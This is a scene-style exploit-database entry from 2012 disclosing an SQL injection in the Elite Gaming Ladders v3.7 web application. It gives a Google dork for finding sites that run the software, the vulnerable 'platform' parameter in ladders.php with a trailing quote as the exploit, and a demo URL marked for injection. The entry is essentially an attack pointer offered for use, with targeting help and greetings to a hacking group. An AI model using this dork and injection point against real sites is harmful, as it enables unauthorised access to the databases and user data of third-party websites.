id: 17709
date: 03/14/2012
title: Elite Gaming Ladders  v3.7 SQL Injection Vulnerability
author: By-ReiS
cves: 

####################################################################################
### Exploit Title : Elite Gaming Ladders  v3.7 SQL Injection Vulnerability
### Category     : Webapps
####################################################################################
### Google Dork: "Powered by: Elite Gaming Ladders v3.7" or "inurl:/ladders.php?platform="
### Version       : 3.7
### Date           : 14.03.2012
### Home         : http://eliteladders.com/
####################################################################################
### Exploit       : /ladders.php?platform=1'
### Demo        :http://site.com/ladders.php?platform=[Ýnjection]
####################################################################################
### Author        : By-ReiS
### Contact      : By-ReiS@passport.com
####################################################################################
### Greetz       :www.Cyber-Warrior.org and all users
####################################################################################



#  0day.today [2023-03-21]  #